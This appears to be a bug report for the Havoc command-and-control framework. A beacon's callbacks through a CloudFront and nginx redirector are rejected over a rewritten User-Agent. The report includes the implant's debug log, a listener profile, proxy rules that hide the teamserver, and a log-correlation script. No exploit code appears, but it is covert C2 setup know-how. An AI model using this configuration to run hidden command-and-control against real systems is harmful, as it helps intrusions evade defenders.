What happened?
The payload executes and is trying to reach the teamserver, but the teamserver does not respond to the callback. I'm using an nginx reverse proxy, and I can see the callback reaching the teamserver because it prints something about the user-agent not being valid.
To be fair, this is probably more an issue with the teamserver than the demon.
Did You Do a Pull First?
Latest (You performed a pull first)
Did You Try With the Dev Branch?
Yes (You tried using the dev branch but the problem persists)
Relevant log output
Y:\>demon.x64.exe
[DEBUG::WinMain::5] WinMain: hInstance:[00000073f63fb000] hPrevInstance:[00007ff72e6c4500] lpCmdLine:[] nShowCmd:[778847488]
[DEBUG::DemonInit::290] TRANSPORT_HTTP
[DEBUG::DemonInit::393] OSVersion: 10
[DEBUG::DemonConfig::581] Config Size: 650
[DEBUG::DemonConfig::588] Sleep: 2 (15%)
[DEBUG::DemonConfig::593] [CONFIG] Memory:
- Allocate: 2
- Execute : 2
[DEBUG::DemonConfig::609] [CONFIG] Spawn:
- [x64] => C:\Windows\System32\mtstocom.exe
- [x86] => C:\Windows\SysWOW64\mtstocom.exe
[DEBUG::DemonConfig::629] [CONFIG] Sleep Obfuscation:
- Technique: 0
- Stack Dup: FALSE
[CONFIG] ProxyLoading: 0
[CONFIG] SysIndirect : FALSE
[CONFIG] AmsiEtwPatch: 0
[DEBUG::DemonConfig::645] KillDate: 0
[DEBUG::DemonConfig::667] [CONFIG] Hosts [1]
:[DEBUG::DemonConfig::673] - d[redacted].cloudfront.net:443
[DEBUG::HostAdd::359] Host -> Host:[d[redacted].cloudfront.net] Size:[60] Port:[443]
[DEBUG::DemonConfig::682] Hosts added => 1
[DEBUG::DemonConfig::686] Host going to be used is => d[redacted].cloudfront.net:443
[DEBUG::DemonConfig::690] [CONFIG] Secure: TRUE
[DEBUG::DemonConfig::696] [CONFIG] UserAgent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
[DEBUG::DemonConfig::701] [CONFIG] Headers [1]:
[DEBUG::DemonConfig::709] - Content-type: */*
[DEBUG::DemonConfig::717] [CONFIG] Uris [2]:
[DEBUG::DemonConfig::725] - /book-an-appointment.html
[DEBUG::DemonConfig::725] - /results.html
[DEBUG::DemonConfig::762] [CONFIG] [PROXY] Disabled
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "WS2_32.DLL": 00007fffcc9e0000
[DEBUG::RtWs2_32::383] Loaded Ws2_32 functions
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "SHELL32.DLL": 00007fffcb270000
[DEBUG::RtShell32::198] Loaded Shell32 functions
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "NETAPI32.DLL": 00007fffbd450000
[DEBUG::RtNetApi32::339] Loaded NetApi32 functions
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "OLEAUT32.DLL": 00007fffcc6b0000
[DEBUG::RtOleaut32::132] Loaded Oleaut32 functions
[DEBUG::RtUser32::166] Loaded User32 functions
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "WINHTTP.DLL": 00007fffc2480000
[DEBUG::RtWinHttp::496] Loaded WinHttp functions
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "SSPICLI.DLL": 00007fffca190000
[DEBUG::RtSspicli::423] Loaded Sspicli functions
[DEBUG::RtGdi32::300] Loaded Gdi32 functions
[DEBUG::RtMsvcrt::230] Loaded Msvcrt functions
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "ADVAPI32.DLL": 00007fffcc780000
[DEBUG::RtAdvapi32::57] Loaded Advapi32 functions
[DEBUG::LdrModuleLoad::335] Loading module using LdrLoadDll
[DEBUG::LdrModuleLoad::354] Module "IPHLPAPI.DLL": 00007fffc9670000
[DEBUG::RtIphlpapi::263] Loaded Iphlpapi functions
[DEBUG::SysNtQueryInformationProcess::227] NtQueryInformationProcess( ... ) = 00000000
[DEBUG::CfgQueryEnforced::1248] Control Flow Guard Policy Enabled = FALSE
[DEBUG::DemonInit::570] Instance DemonID => 21f1808a
[DEBUG::SysNtOpenThreadToken::55] NtOpenThreadToken( ... ) = c000007c
[DEBUG::SysNtOpenProcessToken::68] NtOpenProcessToken( ... ) = 00000000
[DEBUG::SysNtQueryInformationToken::410] NtQueryInformationToken( ... ) = 00000000
[DEBUG::SysNtClose::451] NtClose( ... ) = 00000000
[DEBUG::TransportInit::15] Connecting to listener
[DEBUG::HttpSend::251] HttpQueryStatus Failed: Is not HTTP_STATUS_OK (200)
[DEBUG::HostRotation::489] Specified to keep going. To infinity... and beyond
[DEBUG::PackageTransmitNow::264] TransportSend failed!
[DEBUG::TransportInit::15] Connecting to listener
[DEBUG::HttpSend::251] HttpQueryStatus Failed: Is not HTTP_STATUS_OK (200)
[DEBUG::HostRotation::489] Specified to keep going. To infinity... and beyond
[DEBUG::PackageTransmitNow::264] TransportSend failed!
[DEBUG::TransportInit::15] Connecting to listener
[DEBUG::HttpSend::251] HttpQueryStatus Failed: Is not HTTP_STATUS_OK (200)
[DEBUG::HostRotation::489] Specified to keep going. To infinity... and beyond
[DEBUG::PackageTransmitNow::264] TransportSend failed!
[DEBUG::TransportInit::15] Connecting to listener
[DEBUG::HttpSend::251] HttpQueryStatus Failed: Is not HTTP_STATUS_OK (200)
[DEBUG::HostRotation::489] Specified to keep going. To infinity... and beyond
[DEBUG::PackageTransmitNow::264] TransportSend failed!
^C
Nginx logs:
[Cloudfront IP Redacted] - - [10/Jan/2024:08:39:41 +0000] POST /book-an-appointment.html HTTP/1.1 404 146 - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 [Source IP Redacted]
[Cloudfront IP Redacted] - - [10/Jan/2024:08:39:43 +0000] POST /book-an-appointment.html HTTP/1.1 404 146 - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 [Source IP Redacted]
[Cloudfront IP Redacted] - - [10/Jan/2024:08:39:46 +0000] POST /book-an-appointment.html HTTP/1.1 404 146 - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 [Source IP Redacted]
[Cloudfront IP Redacted] - - [10/Jan/2024:08:39:48 +0000] POST /book-an-appointment.html HTTP/1.1 404 146 - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 [Source IP Redacted]
Teamserver logs:
$ ./havoc server --profile ./profiles/havoc.yaotl -v --debug-dev
[Havoc ASCII-art banner: "pwn and elevate until it's done"]
[08:36:45] [INFO] Havoc Framework [Version: 0.7] [CodeName: Bites The Dust]
[08:36:45] [INFO] Havoc profile: ./profiles/havoc.yaotl
[08:36:45] [INFO] Build:
- Compiler x64 : data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc
- Compiler x86 : data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc
- Nasm : /usr/bin/nasm
[08:36:45] [INFO] Time: 10/01/2024 08:36:45
[08:36:45] [INFO] Teamserver logs saved under: data/loot/2024.01.10._08:36:45
[08:36:45] [INFO] Starting Teamserver on wss://0.0.0.0:50050
[08:36:45] [INFO] [SERVICE] starting service handle on wss://0.0.0.0:50050/service-endpoint
[08:36:45] [INFO] Opens existing database: data/teamserver.db
[08:36:45] [INFO] Started "Agent Listener - HTTPs" listener: https://0.0.0.0:443
[08:37:01] [GOOD] User <test> Authenticated
[08:39:41] [WARN] got a request with an invalid user agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 - Original IP [Cloudfront IP Redacted]
[08:39:43] [WARN] got a request with an invalid user agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 - Original IP [Cloudfront IP Redacted]
[08:39:46] [WARN] got a request with an invalid user agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 - Original IP [Cloudfront IP Redacted]
[08:39:48] [WARN] got a request with an invalid user agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 - Original IP [Cloudfront IP Redacted]
Excerpt from profile:
[...]
Demon {
    Sleep = 2
    Jitter = 15
    TrustXForwardedFor = true
    Injection {
        Spawn64 = "C:\\Windows\\System32\\mtstocom.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\mtstocom.exe"
    }
}
Listeners {
    Http {
        Name = "Agent Listener - HTTPs"
        Hosts = [
            "d[REDACTED].cloudfront.net"
        ]
        HostBind = "0.0.0.0"
        PortBind = 443
        PortConn = 443
        HostRotation = "round-robin"
        Secure = true
        UserAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
        Uris = [
            "/book-an-appointment.html",
            "/results.html",
        ]
        Headers = [
        ]
        Response {
            Headers = [
            ]
        }
    }
}
Nginx config:
location "/book-an-appointment.html" {
    error_page 403 = @proxied;
    include blockedips.conf;
    proxy_pass https://[teamserver-ip]:443;
    proxy_set_header Host $host:443;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $remote_addr;
    # Forwards "<client User-Agent> - Original IP <client address>" upstream as the User-Agent
    proxy_set_header "User-Agent" "${http_user_agent} - Original IP ${remote_addr}";
}
location "/results.html" {
    error_page 403 = @proxied;
    include blockedips.conf;
    proxy_pass https://[teamserver-ip]:443;
    proxy_set_header Host $host:443;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $remote_addr;
    # Forwards "<client User-Agent> - Original IP <client address>" upstream as the User-Agent
    proxy_set_header "User-Agent" "${http_user_agent} - Original IP ${remote_addr}";
}
blockedips.conf is set to allow all for testing purposes.
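As an added example (not Havoc project code and not the reporter's own tooling), the script below correlates the three log excerpts posted above. It pairs each teamserver WARN with the nginx request logged in the same second, checks that the User-Agent nginx received from the client equals the profile's UserAgent, and then reports how the User-Agent the teamserver received differs from that profile value. The log lines and the profile UserAgent are copied from the issue with its redaction placeholders left in place. On these lines the upstream User-Agent is the profile value with " - Original IP [Cloudfront IP Redacted]" appended, which is the string the proxy_set_header "User-Agent" line in the posted nginx config constructs; the same correlation is useful on the defensive side for spotting a reverse proxy that silently rewrites request headers.

```python
# Added example: correlate the demon, nginx and teamserver log excerpts from this issue.
# Log lines and the profile User-Agent are copied from the issue as posted.
import re

# UserAgent from the posted profile excerpt (Listeners -> Http -> UserAgent).
PROFILE_USER_AGENT = (
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
)

# Teamserver WARN lines as posted in the issue.
TEAMSERVER_LOG = """\
[08:39:41] [WARN] got a request with an invalid user agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 - Original IP [Cloudfront IP Redacted]
[08:39:43] [WARN] got a request with an invalid user agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 - Original IP [Cloudfront IP Redacted]
[08:39:46] [WARN] got a request with an invalid user agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 - Original IP [Cloudfront IP Redacted]
[08:39:48] [WARN] got a request with an invalid user agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 - Original IP [Cloudfront IP Redacted]
"""

# nginx access-log lines as posted in the issue.
NGINX_LOG = """\
[Cloudfront IP Redacted] - - [10/Jan/2024:08:39:41 +0000] POST /book-an-appointment.html HTTP/1.1 404 146 - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 [Source IP Redacted]
[Cloudfront IP Redacted] - - [10/Jan/2024:08:39:43 +0000] POST /book-an-appointment.html HTTP/1.1 404 146 - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 [Source IP Redacted]
[Cloudfront IP Redacted] - - [10/Jan/2024:08:39:46 +0000] POST /book-an-appointment.html HTTP/1.1 404 146 - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 [Source IP Redacted]
[Cloudfront IP Redacted] - - [10/Jan/2024:08:39:48 +0000] POST /book-an-appointment.html HTTP/1.1 404 146 - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 [Source IP Redacted]
"""

TS_WARN_RE = re.compile(
    r"^\[(?P<time>\d\d:\d\d:\d\d)\] \[WARN\] "
    r"got a request with an invalid user agent: (?P<ua>.*)$"
)
# Posted nginx format: client - - [date:time zone] METHOD path HTTP/x status bytes
# referer user-agent source. Bracketed redaction placeholders may contain spaces.
NGINX_RE = re.compile(
    r"^(?P<client>\[[^\]]+\]|\S+) \S+ \S+ "
    r"\[(?P<date>[^\]:]+):(?P<time>\d\d:\d\d:\d\d) [^\]]+\] "
    r"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+ (?P<status>\d{3}) "
    r"(?P<size>\d+|-) (?P<referer>\S+) (?P<ua>.*?) (?P<source>\[[^\]]+\]|\S+)$"
)


def rejected_user_agents(log):
    """(time, user-agent) for each teamserver WARN about an invalid User-Agent."""
    return [(m["time"], m["ua"]) for line in log.splitlines() if (m := TS_WARN_RE.match(line))]


def parse_nginx(log):
    """Parse the posted nginx access-log format into dicts; unparseable lines are skipped."""
    rows = []
    for line in log.splitlines():
        m = NGINX_RE.match(line)
        if m:
            row = m.groupdict()
            row["status"] = int(row["status"])
            rows.append(row)
    return rows


def diff_user_agent(seen, expected):
    """Describe how the User-Agent the teamserver saw differs from the profile value."""
    if seen == expected:
        return {"match": True, "kind": "exact", "extra": ""}
    if seen.startswith(expected):
        return {"match": False, "kind": "suffix-appended", "extra": seen[len(expected):]}
    if seen.endswith(expected):
        return {"match": False, "kind": "prefix-prepended", "extra": seen[:-len(expected)]}
    return {"match": False, "kind": "different", "extra": ""}


def seconds_between(times):
    """Gaps in seconds between consecutive HH:MM:SS timestamps (same day assumed)."""
    def secs(t):
        h, m, s = (int(x) for x in t.split(":"))
        return h * 3600 + m * 60 + s
    vals = [secs(t) for t in times]
    return [b - a for a, b in zip(vals, vals[1:])]


def correlate(ts_log, nginx_log, expected_ua):
    """Pair each teamserver rejection with the nginx request logged in the same second."""
    by_time = {r["time"]: r for r in parse_nginx(nginx_log)}
    out = []
    for time, ua in rejected_user_agents(ts_log):
        req = by_time.get(time)
        out.append({
            "time": time,
            "path": req["path"] if req else None,
            "status": req["status"] if req else None,
            # What the client sent to nginx, compared with the profile value
            "client_ua_matches_profile": (req["ua"] == expected_ua) if req else None,
            # What nginx forwarded to the teamserver, compared with the profile value
            "upstream_ua": diff_user_agent(ua, expected_ua),
        })
    return out


if __name__ == "__main__":
    rows = correlate(TEAMSERVER_LOG, NGINX_LOG, PROFILE_USER_AGENT)
    for r in rows:
        print(f"{r['time']} {r['path']} -> {r['status']} | client UA matches profile: "
              f"{r['client_ua_matches_profile']} | upstream UA {r['upstream_ua']['kind']}: "
              f"{r['upstream_ua']['extra']!r}")
    print("seconds between callbacks:", seconds_between([r["time"] for r in rows]))
```

Running it prints one row per rejected callback showing that nginx received the exact profile User-Agent from the client while the teamserver received it with a suffix, plus the 2 to 3 second gaps between callbacks that line up with the profile's Sleep of 2 and Jitter of 15.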
Did You Read Over Your Issue First?
[X] I declare I made an effort and provided the necessary information for replication of the issue.